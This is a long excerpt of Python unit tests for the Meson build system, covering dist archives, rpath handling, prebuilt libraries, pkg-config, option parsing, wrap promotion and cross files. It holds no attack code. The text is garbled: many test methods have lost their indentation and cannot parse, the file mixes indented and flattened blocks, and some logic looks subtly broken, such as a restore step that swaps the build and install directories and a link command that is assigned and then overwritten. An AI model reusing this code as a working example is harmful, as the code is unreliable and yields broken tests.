        # checkout (git or hg). Builds a tiny throwaway C project, runs
        # ``meson dist``, and verifies that the tar.xz and zip archives
        # plus their .sha256sum files are produced with the expected
        # contents, with and without --include-subprojects.
        #
        # Create this on the fly because having rogue .git directories inside
        # the source tree leads to all kinds of trouble.
        with tempfile.TemporaryDirectory() as project_dir:
            with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
                ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
            with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
                ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
    printf("I am a distribution test.\\n");
    return 0;
}
''')
            # Expected archive and checksum paths inside the build's distdir.
            xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
            xz_checksumfile = xz_distfile + '.sha256sum'
            zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
            zip_checksumfile = zip_distfile + '.sha256sum'
            vcs_init(project_dir)
            if include_subprojects:
                # Only 'vcssub' is itself a VCS checkout; 'tarballsub' is a
                # plain directory and 'unusedsub' is never referenced.
                vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
                self.create_dummy_subproject(project_dir, 'tarballsub')
                self.create_dummy_subproject(project_dir, 'unusedsub')
            self.init(project_dir)
            self.build('dist')
            # The default format is tar.xz only; no zip should be produced.
            self.assertPathExists(xz_distfile)
            self.assertPathExists(xz_checksumfile)
            self.assertPathDoesNotExist(zip_distfile)
            self.assertPathDoesNotExist(zip_checksumfile)
            self._run(self.meson_command + ['dist', '--formats', 'zip'],
                      workdir=self.builddir)
            self.assertPathExists(zip_distfile)
            self.assertPathExists(zip_checksumfile)
            if include_subprojects:
                # Without --include-subprojects the archive only contains
                # the main project's files.
                z = zipfile.ZipFile(zip_distfile)
                self.assertEqual(sorted(['disttest-1.4.3/',
                                         'disttest-1.4.3/meson.build',
                                         'disttest-1.4.3/distexe.c']),
                                 sorted(z.namelist()))
                # With --include-subprojects the used subprojects appear;
                # 'unusedsub' must still be excluded.
                self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
                          workdir=self.builddir)
                z = zipfile.ZipFile(zip_distfile)
                self.assertEqual(sorted(['disttest-1.4.3/',
                                         'disttest-1.4.3/subprojects/',
                                         'disttest-1.4.3/meson.build',
                                         'disttest-1.4.3/distexe.c',
                                         'disttest-1.4.3/subprojects/tarballsub/',
                                         'disttest-1.4.3/subprojects/vcssub/',
                                         'disttest-1.4.3/subprojects/tarballsub/meson.build',
                                         'disttest-1.4.3/subprojects/vcssub/meson.build']),
                                 sorted(z.namelist()))
    def test_rpath_uses_ORIGIN(self):
        '''
        Test that built targets use $ORIGIN in rpath, which ensures that they
        are relocatable and ensures that builds are reproducible since the
        build directory won't get embedded into the built binaries.
        '''
        if is_windows() or is_cygwin():
            raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
        testdir = os.path.join(self.common_test_dir, '42 library chain')
        self.init(testdir)
        self.build()
        # These link against other libs, so every rpath entry must be $ORIGIN-relative.
        for each in ('prog', 'subdir/liblib1.so', ):
            rpath = get_rpath(os.path.join(self.builddir, each))
            self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
            if is_dragonflybsd():
                # DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
                # so ignore that.
                self.assertTrue(rpath.startswith('/usr/lib/gcc'))
                rpaths = rpath.split(':')[1:]
            else:
                rpaths = rpath.split(':')
            for path in rpaths:
                self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
        # These two don't link to anything else, so they do not need an rpath entry.
        for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
            rpath = get_rpath(os.path.join(self.builddir, each))
            if is_dragonflybsd():
                # The rpath should be equal to /usr/lib/gccVERSION
                self.assertTrue(rpath.startswith('/usr/lib/gcc'))
                self.assertEqual(len(rpath.split(':')), 1)
            else:
                # No rpath at all on other platforms.
                self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
    def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
        # Compile *source* and link it into the shared library *outfile*
        # outside of meson. *impfile* is only used for the MSVC import
        # library; the intermediate object file is always removed.
        if extra_args is None:
            extra_args = []
        if compiler.get_argument_syntax() == 'msvc':
            # MSVC-style: link via the compiler's linker with /DLL.
            link_cmd = compiler.get_linker_exelist() + [
                '/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
                '/OUT:' + outfile, objectfile]
        else:
            # Position-independent code is required for shared objects on
            # ELF platforms; Windows/Cygwin/macOS don't take -fPIC.
            if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
                extra_args += ['-fPIC']
            link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
            if not mesonbuild.mesonlib.is_osx():
                # Give the library a proper soname everywhere except macOS.
                link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
        self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
        try:
            subprocess.check_call(link_cmd)
        finally:
            os.unlink(objectfile)
    def test_prebuilt_shared_lib(self):
        # A pre-built shared library can be consumed by a meson project.
        # The library filename depends on the platform naming convention.
        (cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
        tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
        source = os.path.join(tdir, 'alexandria.c')
        objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
        impfile = os.path.join(tdir, 'alexandria.lib')
        if cc.get_argument_syntax() == 'msvc':
            shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
        elif is_cygwin():
            shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
        else:
            shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
        self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
        # Run the test
        try:
            self.init(tdir)
            self.build()
            self.run_tests()
        finally:
            os.unlink(shlibfile)
            if mesonbuild.mesonlib.is_windows():
                # Clean up all the garbage MSVC writes in the
                # source tree.
                for fname in glob(os.path.join(tdir, 'alexandria.*')):
                    if os.path.splitext(fname)[1] not in ['.c', '.h']:
                        os.unlink(fname)
    @skipIfNoPkgconfig
    def test_pkgconfig_static(self):
        '''
        Test that the we prefer static libraries when `static: true` is
        passed to dependency() with pkg-config. Can't be an ordinary test
        because we need to build libs and try to find them from meson.build
        Also test that it's not a hard error to have unsatisfiable library deps
        since system libraries -lm will never be found statically.
        https://github.com/mesonbuild/meson/issues/2785
        '''
        (cc, stlinker, objext, shext) = self.detect_prebuild_env()
        testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
        source = os.path.join(testdir, 'foo.c')
        objectfile = os.path.join(testdir, 'foo.' + objext)
        stlibfile = os.path.join(testdir, 'libfoo.a')
        impfile = os.path.join(testdir, 'foo.lib')
        # Shared library name follows the platform's naming convention.
        if cc.get_argument_syntax() == 'msvc':
            shlibfile = os.path.join(testdir, 'foo.' + shext)
        elif is_cygwin():
            shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
        else:
            shlibfile = os.path.join(testdir, 'libfoo.' + shext)
        # Build libs: both a static and a shared libfoo must exist so that
        # meson has a real choice to make.
        self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
        self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
        # Run test
        try:
            self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
            self.build()
            self.run_tests()
        finally:
            os.unlink(stlibfile)
            os.unlink(shlibfile)
            if mesonbuild.mesonlib.is_windows():
                # Clean up all the garbage MSVC writes in the
                # source tree.
                for fname in glob(os.path.join(testdir, 'foo.*')):
                    if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
                        os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
    def test_subproject_promotion(self):
        # Exercise `meson wrap promote`: copying a nested subproject up into
        # the top-level subprojects dir, rejecting ambiguous or invalid
        # names, and promoting .wrap files. Works on a copy of the test dir
        # since promotion mutates the tree.
        testdir = os.path.join(self.unit_test_dir, '12 promote')
        workdir = os.path.join(self.builddir, 'work')
        shutil.copytree(testdir, workdir)
        spdir = os.path.join(workdir, 'subprojects')
        s3dir = os.path.join(spdir, 's3')
        scommondir = os.path.join(spdir, 'scommon')
        # Promoting an unambiguous subproject by name succeeds.
        self.assertFalse(os.path.isdir(s3dir))
        subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
        self.assertTrue(os.path.isdir(s3dir))
        # 'scommon' exists in more than one place, so the bare name must fail...
        self.assertFalse(os.path.isdir(scommondir))
        self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
                                            cwd=workdir,
                                            stdout=subprocess.DEVNULL), 0)
        # ...and a nonexistent path must fail too.
        self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
                                            cwd=workdir,
                                            stderr=subprocess.DEVNULL), 0)
        self.assertFalse(os.path.isdir(scommondir))
        # A full path disambiguates and succeeds.
        subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
        self.assertTrue(os.path.isdir(scommondir))
        # Promotion also works for .wrap files.
        promoted_wrap = os.path.join(spdir, 'athing.wrap')
        self.assertFalse(os.path.isfile(promoted_wrap))
        subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
        self.assertTrue(os.path.isfile(promoted_wrap))
        # The promoted tree must still configure and build.
        self.init(workdir)
        self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
    def test_templates(self):
        # Exercise `meson init` project templates for every language whose
        # compiler is available, for both executable and library targets,
        # in an empty dir and in a dir with an existing source file.
        ninja = detect_ninja()
        if ninja is None:
            raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
        # C is always assumed to be available; probe for the others.
        langs = ['c']
        env = get_fake_env()
        try:
            env.detect_cpp_compiler(MachineChoice.HOST)
            langs.append('cpp')
        except EnvironmentException:
            pass
        try:
            env.detect_d_compiler(MachineChoice.HOST)
            langs.append('d')
        except EnvironmentException:
            pass
        try:
            env.detect_fortran_compiler(MachineChoice.HOST)
            if is_windows() or platform.machine().lower() != 'e2k':
                # Elbrus Fortran compiler can't generate debug information
                langs.append('fortran')
        except EnvironmentException:
            pass
        try:
            env.detect_objc_compiler(MachineChoice.HOST)
            langs.append('objc')
        except EnvironmentException:
            pass
        # FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
        for lang in langs:
            for target_type in ('executable', 'library'):
                # test empty directory
                with tempfile.TemporaryDirectory() as tmpdir:
                    self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
                              workdir=tmpdir)
                    self._run(self.setup_command + ['--backend=ninja', 'builddir'],
                              workdir=tmpdir)
                    self._run(ninja,
                              workdir=os.path.join(tmpdir, 'builddir'))
            # test directory with existing code file
            if lang in ('c', 'cpp'):
                with tempfile.TemporaryDirectory() as tmpdir:
                    with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
                        f.write('int main(void) {}')
                    # `init -b` generates the build files and builds in one go.
                    self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
    # The test uses mocking and thus requires that
    # the current process is the one to run the Meson steps.
    # If we are using an external test executable (most commonly
    # in Debian autopkgtests) then the mocking won't work.
    @unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
    def test_cross_file_system_paths(self):
        # Cross files can be looked up by bare name in the XDG data dirs
        # (XDG_DATA_HOME, XDG_DATA_DIRS) and in ~/.local/share/meson/cross.
        if is_windows():
            raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
        if is_sunos():
            cc = 'gcc'
        else:
            cc = 'cc'

        testdir = os.path.join(self.common_test_dir, '1 trivial')
        cross_content = textwrap.dedent("""\
            [binaries]
            c = '/usr/bin/{}'
            ar = '/usr/bin/ar'
            strip = '/usr/bin/ar'

            [properties]

            [host_machine]
            system = 'linux'
            cpu_family = 'x86'
            cpu = 'i686'
            endian = 'little'
            """.format(cc))

        # Case 1: cross file found via XDG_DATA_HOME, then via XDG_DATA_DIRS.
        with tempfile.TemporaryDirectory() as d:
            dir_ = os.path.join(d, 'meson', 'cross')
            os.makedirs(dir_)
            with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
                f.write(cross_content)
            name = os.path.basename(f.name)

            with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
                self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
                self.wipe()

            with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
                os.environ.pop('XDG_DATA_HOME', None)
                self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
                self.wipe()

        # Case 2: fallback lookup in ~/.local/share/meson/cross (with the
        # home dir redirected into a temp dir via expanduser).
        with tempfile.TemporaryDirectory() as d:
            dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
            os.makedirs(dir_)
            with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
                f.write(cross_content)
            name = os.path.basename(f.name)

            # If XDG_DATA_HOME is set in the environment running the
            # tests this test will fail, so mock the environment, pop
            # it, then test
            with mock.patch.dict(os.environ):
                os.environ.pop('XDG_DATA_HOME', None)
                with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
                    self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
                    self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
    """Passing the same builtin option with both -D and -- syntax must fail.

    Bug fix: the message assertion used to sit *inside* the assertRaises
    block — init() raises first, so it never ran — and it read ``e.stderr``,
    an attribute the assertRaises context manager does not have.  The check
    now runs after the block and inspects ``e.exception.output`` like the
    sibling tests do.
    """
    testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
    with self.assertRaises(subprocess.CalledProcessError) as e:
        self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
    # Just to ensure that we caught the correct error
    self.assertIn('passed as both', e.exception.output)
def _test_same_option_twice(self, arg, args):
    """Configure with *args*; the last value given for *arg* must win ('bar')."""
    testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
    self.init(testdir, extra_args=args)
    options = self.introspect('--buildoptions')
    found = next((o for o in options if o['name'] == arg), None)
    if found is None:
        raise Exception('Missing {} value?'.format(arg))
    self.assertEqual(found['value'], 'bar')
def test_same_dash_option_twice(self):
    """Repeating --bindir on the command line: the last value wins."""
    args = ['--bindir=foo', '--bindir=bar']
    self._test_same_option_twice('bindir', args)
def test_same_d_option_twice(self):
    """Repeating -Dbindir on the command line: the last value wins."""
    args = ['-Dbindir=foo', '-Dbindir=bar']
    self._test_same_option_twice('bindir', args)
def test_same_project_d_option_twice(self):
    """Repeating a project -D option on the command line: the last value wins."""
    args = ['-Done=foo', '-Done=bar']
    self._test_same_option_twice('one', args)
def _test_same_option_twice_configure(self, arg, args):
    """Run `meson configure` with *args*; the last value for *arg* must win ('bar')."""
    testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
    self.init(testdir)
    self.setconf(args)
    options = self.introspect('--buildoptions')
    found = next((o for o in options if o['name'] == arg), None)
    if found is None:
        raise Exception('Missing {} value?'.format(arg))
    self.assertEqual(found['value'], 'bar')
def test_same_dash_option_twice_configure(self):
    """Repeated --bindir via `meson configure`: the last value wins."""
    args = ['--bindir=foo', '--bindir=bar']
    self._test_same_option_twice_configure('bindir', args)
def test_same_d_option_twice_configure(self):
    """Repeated -Dbindir via `meson configure`: the last value wins."""
    args = ['-Dbindir=foo', '-Dbindir=bar']
    self._test_same_option_twice_configure('bindir', args)
def test_same_project_d_option_twice_configure(self):
    """Repeated project -D option via `meson configure`: the last value wins."""
    args = ['-Done=foo', '-Done=bar']
    self._test_same_option_twice_configure('one', args)
def test_command_line(self):
    """End-to-end command-line option handling for `meson` and `meson configure`.

    Covers: project() defaults, --warnlevel vs -Dwarning_level, the ban on
    mixing --opt with -Dopt for the same option, unknown/malformed options,
    subproject options, shell-style splitting of c_args, and last-value-wins
    when an option is given twice.  Statement order matters throughout: each
    section configures, asserts against the pickled coredata, then wipes.
    """
    testdir = os.path.join(self.unit_test_dir, '34 command line')

    # Verify default values when passing no args
    self.init(testdir)
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.builtins['default_library'].value, 'static')
    self.assertEqual(obj.builtins['warning_level'].value, '1')
    self.assertEqual(obj.user_options['set_sub_opt'].value, True)
    self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
    self.wipe()

    # warning_level is special, it's --warnlevel instead of --warning-level
    # for historical reasons
    self.init(testdir, extra_args=['--warnlevel=2'])
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.builtins['warning_level'].value, '2')
    self.setconf('--warnlevel=3')
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.builtins['warning_level'].value, '3')
    self.wipe()

    # But when using -D syntax, it should be 'warning_level'
    self.init(testdir, extra_args=['-Dwarning_level=2'])
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.builtins['warning_level'].value, '2')
    self.setconf('-Dwarning_level=3')
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.builtins['warning_level'].value, '3')
    self.wipe()

    # Mixing --option and -Doption is forbidden
    # NOTE(review): the asserts inside the assertRaises blocks below never
    # execute (init/setconf raises first) — confirm and hoist them out.
    with self.assertRaises(subprocess.CalledProcessError) as cm:
        self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
        self.assertNotEqual(0, cm.exception.returncode)
        self.assertIn('as both', cm.exception.output)
    self.init(testdir)
    with self.assertRaises(subprocess.CalledProcessError) as cm:
        self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
        self.assertNotEqual(0, cm.exception.returncode)
        self.assertIn('as both', cm.exception.output)
    self.wipe()

    # --default-library should override default value from project()
    self.init(testdir, extra_args=['--default-library=both'])
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.builtins['default_library'].value, 'both')
    self.setconf('--default-library=shared')
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.builtins['default_library'].value, 'shared')
    if self.backend is Backend.ninja:
        # reconfigure target works only with ninja backend
        self.build('reconfigure')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.builtins['default_library'].value, 'shared')
    self.wipe()

